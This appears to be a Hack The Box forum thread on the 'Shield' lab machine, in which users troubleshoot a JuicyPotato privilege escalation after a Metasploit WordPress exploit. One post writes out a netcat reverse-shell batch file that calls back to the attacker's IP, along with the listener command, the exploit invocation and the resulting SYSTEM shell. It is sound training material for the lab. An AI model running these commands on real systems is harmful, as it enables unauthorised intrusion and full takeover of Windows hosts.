Type your comment> @Jade86 said:
Type your comment> @misentomanuel said:
I gave that command both on the terminal of my kali and inside meterpreter. Find nothing
Ok, that means that you don’t have the two exploits downloaded on your computer. What the walkthrough doesn’t tell you is that you have to download both nc.exe and JuicyPotato.exe on your machine first, and THEN upload them to the target machine. You can find both of them on github.
https://imgur.com/SLMekBG.png what wrong?
https://imgur.com/Pvteh6T.png i have downloaded 2 files
Type your comment> @misentomanuel said:
Type your comment> @Jade86 said:
Type your comment> @misentomanuel said:
I gave that command both on the terminal of my kali and inside meterpreter. Find nothing
Ok, that means that you don’t have the two exploits downloaded on your computer. What the walkthrough doesn’t tell you is that you have to download both nc.exe and JuicyPotato.exe on your machine first, and THEN upload them to the target machine. You can find both of them on github.
https://imgur.com/SLMekBG.png what wrong?
you need to run js.exe command not in the meterpreter window, but in the netcat session that you are running on port 1111
Type your comment> @Jade86 said:
Type your comment> @misentomanuel said:
Type your comment> @Jade86 said:
Type your comment> @misentomanuel said:
I gave that command both on the terminal of my kali and inside meterpreter. Find nothing
Ok, that means that you don’t have the two exploits downloaded on your computer. What the walkthrough doesn’t tell you is that you have to download both nc.exe and JuicyPotato.exe on your machine first, and THEN upload them to the target machine. You can find both of them on github.
https://imgur.com/SLMekBG.png what wrong?
you need to run js.exe command not in the meterpreter window, but in the netcat session that you are running on port 1111
https://imgur.com/YfPnvei.png what wrong?
you sure need put a command in netcat???
ohhhhh works finally thanks!!
Type your comment> @misentomanuel said:
ohhhhh works finally thanks!!
cool!
Type your comment> @theTCP said:
If it makes anyone feel better, I spent 6+ hours trying to figure what I was doing wrong, feeling like a dumbass and it happened to be that I was downloading an empty JuicyPotatoe.exe because my browser was blocking it. CHECK THE FILE SIZE!
thx man. U saved millions of my neurons.
It really works for me now.
I checked the sizeof Juicy.exe = 0 bytes ((((
hahahaha… How dumbass I am! Oh, gosh! 
As @theTCP said, when I downloaded JuicyPotato to my machine, this bast@rd of my browser did not download all the file. It was zero byte!
So, I just took URL again and downloaded it with ‘wget’.
I ran command and got root. So, let me help with some tips:
You can use the new directory created when you exploit Wordpress with Metasploit. This directory’s name is a letter soup, like this (FyhXqieluV):
[*] Executing the payload at /wordpress/wp-content/plugins/FyhXqieluV/lkoFdnjZGk.php…
You will fall into that kind of directory, so you do not have to go to ‘uploads’.
See if your JuicyPotato downloaded is not zero byte. If so, download it again. It’s size is about 340 K.
Into your directory (that I explained in item 1) you need to have the following files:
a. nc.exe
b. shell.bat
c. js.exe
The first one calls the other, than call the last one. You need all three together in the directory.
Before run JuicyPotato, you will need a new console opened a new netcat. This here will listen to port 1111 in the example and it will be here that you will got System.
So, go there, open a new console and run: nc -nlvp 1111
But port 1111 needs to be declared into ‘shell.bat’.
File’s content (shell.bat):
START C:\inetpub\wwwroot\wordpress\wp-content\plugins\ayjSfnMosV\nc.exe -e powershell.exe 10.10.14.U-IP-HERE 1111
When Port 1337 is used?
I dunno. I used this port in my JuicyPotato command, but Windows system did not opened it, as I could see.
My results:
–XX–
C:\inetpub\wwwroot\wordpress\wp-content\plugins\ayjSfnMosV>js.exe -t * -p .\shell.bat -l 1337
js.exe -t * -p .\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
…
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
–XX–
C:\inetpub\wwwroot\wordpress\wp-content\plugins\ayjSfnMosV>netstat -na |findstr 1337
netstat -na |findstr 1337
C:\inetpub\wwwroot\wordpress\wp-content\plugins\ayjSfnMosV>
–XX–
root@kali:~/htb/juicy-potato# nc -nvlp 1111
listening on [any] 1111 …
connect to [U-IP-HERE] from (UNKNOWN) [10.10.10.29] 50077
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>
JuicyPotato (Rotten Potato) is a pretty confusing and annoying in the beginning, but after have success you will see it is pretty simple to understand and to execute.
Cya!
Hello!
I nee help you with this post: Starting Point - Shield - Challenges - Hack The Box :: Forums
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
but no access.
Please help me figure out what I’m missing.
THX
There are quite a few doubts about this machine, that’s why I dared to make a video, Solución HTB Shield walkthrough JuicyPotato mimikatz - YouTube
dat slash trick ______
I was unaware that this explanation was on here aha. I’ve been struggling with this for a few days. Finally got it on my own though so I’m glad I didn’t know this was here hahaha. nice work everyone
@karlitoxz Thank you for this. As someone new to HTB I found the walk through to be a bit out of sync with my tools and confusing. Following your instructions I was able to get on track. Much appreciated.
